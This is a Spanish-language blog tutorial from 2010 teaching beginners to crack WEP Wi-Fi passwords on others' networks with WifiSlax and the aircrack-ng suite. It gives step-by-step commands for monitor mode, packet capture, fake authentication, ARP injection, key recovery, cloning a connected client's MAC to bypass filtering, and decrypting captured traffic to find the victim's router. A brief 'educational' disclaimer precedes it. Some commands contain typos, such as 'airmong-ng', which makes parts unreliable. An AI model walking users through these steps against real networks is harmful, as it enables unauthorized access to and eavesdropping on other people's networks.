miércoles, 26 de mayo de 2010

Hackear red wifi WifiSlax Wifiway para pricipiantes




Este Tutorial esta orientado a aquellas personas que tienen un cierto grado de dificultad en la auditoria wireless.....
bahhh! sin mucho rodeo esta hecho para principiantes que solo saben abrir y cerrar el messenger y quieren incursionar en la auditoria wireless.


ADVERTENCIA: ESTE TUTORIAL ESTA HECHO CON FINES COMPLETAMENTE EDUCATIVOS Y PARA PERSONAS QUE DESEEN COMPROBAR CUANTA SEGURIDAD TIENEN EN SUS REDES WIFI.
NO ME RESPONSABILISO POR EL USO INDEBIDO DEL MISMO.

Sin mas nada que decir EL TUTORIAL para hackeo wifi con claves WEP

Materiales:

Wifislax 3.1 descargalo desde la pagina de wifislax

Wifislax versión 3.1 (683MB)
http://download.wifislax.com:8080/wifislax-3.1.iso

Wifislax versión 3.1 - reducida (290MB)
http://download.wifislax.com:8080/wifislax-small-3.1.iso

PC con tarjeta de red inalámbrica compatible
- 10 minutos de tu tiempo y un poco de paciencia
- Conocer la dirección MAC de tu tarjeta


(en caso NO sepas tu direccion mac descarga este programa )
MAC ADRESS CHANGER
lo ejecutan y apuntan la mac que sale por defecto alli

Instrucciones:
Deja que bootee el live cd
-Te va a salir una pantalla que dice presione enter si desea continuar
-luego te saldra otra pantalla y le das enter y continuas...
-esperas un buen rato (depende la compu que tengas, si tienes una intel 386 te moriras sentado esperando, pero si tienes algo mejor contentate :P )
-te va a salir una pantalla en negro que te va a pedir un nombre de usuario y contraseña

Usuario: root
Contraseña: toor

y finalmente tecleas

startx

y presionas enter.
-supuestamente van a cargar algunas cosas y entras al entorno grafico.
-una ves en el entorno grafico abres una consola o shell y tecleas

iwconfig

te deberia reconocer la interface de la tarjeta de red. (PD: fijate cual es tu interface y acuerdate de ella ya que con esa interface haremos casi todo; las interfaces pueden ser ath0 en caso de chipset atheros wlan en caso de realtek, etc)

-ahora anda a wifislax/ herramientas wireless/ Asistente wireless
y apuntas la mac y el channel de la red que quieras hackear tambien el SSID o nombre de red.
-ahora necesitamos estar en modo monitor:

para eso vas a wifislax/ Asisitencia chipset/ chipset /modo Monitor

pero si quieres romperte las pelotas y hacerlo por consola tecleas esto:

airmong-ng start 6 ----> 6 lo reemplazas por el canal (channel) de la red que vas a hackear.

quedaria masomenos asi:

airmong-ng start ath0 6

- Ahora que ya estas en modo monitor tecleas esto:

airodump-ng -w COMETESTA -c6

como ya sabes 6 se remplaza por el canal de la red que vas a hackear.
(El "COMETESTA" es un nombre de archivo elegido por tí, se puede llamar "Peluchin" si tú quieres)

-Despues abres una nueva consola o Shell y tecleas esto para asociarte con el access point o punto de acceso de la red que quieres hackear.

aireplay-ng -1 30 -e XXXX -a MACV -h MACC

"XXXX" ---> se reemplaza por la SSID de la red que vas a hackear
"MACV" ---> Direccion Mac que pretendes Hackear
"MACC" ----> Tu direccion Mac

Quedaría más o menos así:

aireplay-ng -1 30 -e COMETESTA -a 00:00:00:00:00 -h 00:00:00:01 ath0

Con esto tu tarjeta quedará asociada con el punto de acceso víctima

deberia salir authentication successfull y deberas mandar paquetes si esto no sucediera y te de algun error en la autenticacion es porque tiene filtrado mac; para solucionar esto te vas a la consola que abriste casi al principio con el airodump y fijate en la parte de abajo quienes estan asociados ,copia cualquiera de esas mac de preferencia la que este generando mayor trafico o que se le envien mas paquetes.

Ahora para clonar la mac deberas ir a wifislax/ herramientas wireless/ macchanger

pero si quieres hacerlo por consola teclea:

ifconfig ath0 hw ether MACCLONADA

- Ahora abres una nueva consola y tecleas esto para empezar a inyectar paquetes:

aireplay-ng -3 -x600 -b MACV -h MACC

(En este momento ya debes saber donde vas a sustituir y con que)

Quedaría más o menos así:

aireplay-ng -3 -x600 -b 00:00:00:00:00 -h 00:00:00:00:01 ath0

Después de esto los paquetes empezarán a ser enviados.
Después de sobrepasados los 100,000 paquetes enviados se procede a obtener la clave.

Abres una nueva consola y escribes lo siguiente:


aircrack-ptw COMETESTA-01.cap

(Aquí se utiliza el nombre de archivo que especificamos casi al principio al
correr el airodump más el -01 o cualquier otro número -02, -03 etc...)

Apuntar Clave y Disfrutar :P

VEN REDES LIBRES PERO NO SE CONECTAN

filtrado mac:
esto es mucho mejor aun ya que solo necesitaran el wifislax para ver que router o tarjetas de red estan asociadas al access point y luego la clonan en windows con el programa MAC ADRESS CHANGER

para saber que mac estan asociadas salteense todos los pasos y vayanse directo a este:

airodump-ng -w COMETESTA -c6
(6 se reemplaza por el canal de la red que vas a hackear)

quedaria masomenos asi:

airodump-ng -w COMETESTA -c6 ath0

SE CONECTARON PERO TIENEN RED LIMITADA O NULA

esto es un problema muy usual , muchas veces los dueños de algunas redes deshabilitan el DHCP eso significa que tienes que configurar manualmente el IP, DNS, ETC...
pero que pasa si el dueño cambio la direccion de su router y no es la que viene por defecto.

1º Captura de datos

Como de costumbre ponemos la tarjeta en modo monitor y abrimos el airodump

Código:

airodump

ejemplo:

airodump ath0 COMETESTA 6

Eso sí, tiene que haber alguien conectado, si no creo que va a ser imposible conseguir las Ips. Con unos pocos DATA es suficiente.

ahora van a home en wifislax y veran su archivo.cap

ponen su memoria usb y le dan doble click al archivo.cap
les preguntara donde lo quieren guardar y seleccionan su memoria usb desde storage media.

entran a windows , descarguen wireshark

version 32 bits para windows
http://media-2.cacetech.com/wireshark/win32/wireshark-win32-1.2.6.exe

ahora abrimos nuestra captura con el wireshark ,si este esta encryptado activen la opcion wireless toolbar. y en la barrita que les aparece se coloca la clave wep que hallaron con el aircrack y wireshark les desencriptara el trafico , la otra opcion es usar el airdecap y con este desencriptar el trafico.

Si la red tiene WEP o WPA, primero hay que desencriptar los DATOS, de lo contrario veran todo así:




Para ello usaremos el airdecap:

Si la red tiene WEP:

airdecap -w CLAVEENHEXADECIMALSINPUNTOS archivo.cap

Si tiene WPA:

airdecap -e ESSID(nombre de la red) -p clave

En mi caso, tiene WEP, así que como la clave es 1231231231 hago:

airdecap -w 1231231231 COMETESTA-01.cap

Obtendré el archivo COMETESTA-01-dec.cap, y si los paquetes han sido desencriptados de forma correcta, es decir, la clave es correcta, veremos en Number of Decrypted Paquets un número mayor a 0 que debería ser igual al número de paquetes que tenemos. Yo tenía 30, pues 30.



ahora recien abrimos el .cap con wireshark ; nos mostrara algo asi:







ahora añadimos las columnas que nos faltan


despues te vas la opcion que dice columns y ahi tendras que aumentar la dos columnas faltantes haces clic en NEW y donde dice TITLE le pones un nombre a la columna en mi caso le puse MAC SOURCE en donde dice FORMAT clic en la flechita y veras que te muestra una lista con muchas opciones buscas la que dice HARDWARE SRC ADDR y luego con los botones de UP lo subes hasta donde se ve en la foto luego repites el proceso clic en NEW en TITLE le pones el nombre de MAC DEST en format buscas HARDWARE DEST ADDR y UP la subes hasta donde se ve en la foto
despues clic en APPLY y luego en OK




ahora el wireshark mostrara dos columnas mas las que agragamos se vera así


bueno ya esta casi listo todo .

debemos activar estas opciones mas tal como esta en la foto




ordenar la captura haciendo clic en PROTOCOL de wireshark y tenemos que ver los paquetes HTTP y TCP

ahora veran una lista de ip's, ponganse una de esas y abran el look@Lan

pueden descargarlo desde aqui:

http://www.4shared.com/file/105047629/b696a319/LookLAN.html

La máscara de red no la ponemos, ya nos la pone el Windows automáticamente según la IP que pongamos. En IP, ponemos cualquiera dentro del rango, yo puse 192.168.1.200. Abrimos el Look@lan, (importante,la última versión, ya que es la única que coge los routers) y veremos varias direcciones IP.





Una es la nuestra, y las otras pueden ser del router o de otro ordenador. Entonces abrimos el explorador y vamos probando.












La del router nos responderá pidiendo usuario y clave. Entonces volvemos a lo de las propiedades de la tarjeta y añadimos la puerta de enlace, en mi caso 192.168.1.1

NOTA: NO SIEMPRE EL ROUTER TIENE SU CONFIGURACION VIA WEB ASI QUE A VECES PUEDEN PENSAR QUE NINGUNO DE LOS IP'S FUNCIONA; PERO NO ES ASI SOLO LES QUEDARA IR PRoBANDO DE UNO EN UNO COMO DNS.








luego para probar si hay internet
inicio/ejecutar
ping www.google.es -t
si es que hace ping es porque hay internet.

ERRORES Y SOLUCIONES EN TARJETAS WIRELESS :

tarjeta DWA-210 D-LINK NO RECONOCIDA
rmmod rt61

luego tecleas esto:

modprobe t61

y finalmente esto:

ifconfig wlan0 up (en algunos casos no da con "wlan" entonces lo reemplazan por "ra0" )

inyectar con atheros ar9285 y wifiway 1.0 final

link de descarga wifiway 1.0 final

http://download.wifislax.com:8080/wifiway-1-final.iso

Bueno la cosa esta en utilizar unos drivers que se llaman (compat-wireless-2.6.30.tar.bz2) que los pueden descargar desde la página oficial aquí:

http://linuxwireless.org/en/users/Download/stable/

o desde este link alternativo:

http://depositfiles.com/es/files/unc8lhpcc

Una vez descargados los drivers hacen lo siguiente:

Copiar la carpeta descomprimida (compat-wireless-2.6.30) en el directorio root de WifiWay 1.0 final.
Abrir una consola y poner los siguientes códigos:


cd /root/compat-wireless-2.6.30
make
make install
make unload
make load

este proceso tarda unos 15 minutos pero no se preocupen, todo va bien, cuando se acabe de instalar hacen un reboot y ya les detectara la tarjeta como wlan0, creo que no hace falta explicar que si utilizan el live CD los cambios se pierden, así que lo suyo es instalar WifiWay 1.0 final en una SD o USB de 2 GB como mínimo y utilizar el modo Persistent Changes.
Bueno entonces ya tienen la interface wlan0 ahora la ponemos en modo monitor escribiendo:

airmon-ng start wlan0

les dirá que ha puesto la tarjeta en modo monitor pero en una interface nueva que se llama mon0 que es la que vamos a utilizar para hacer las auditorias, para cambiar la mac de la interface por la mac falsa deben hacerlo así:

ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up


Cualquier Duda solo comenten y respondere a la brevedad ;)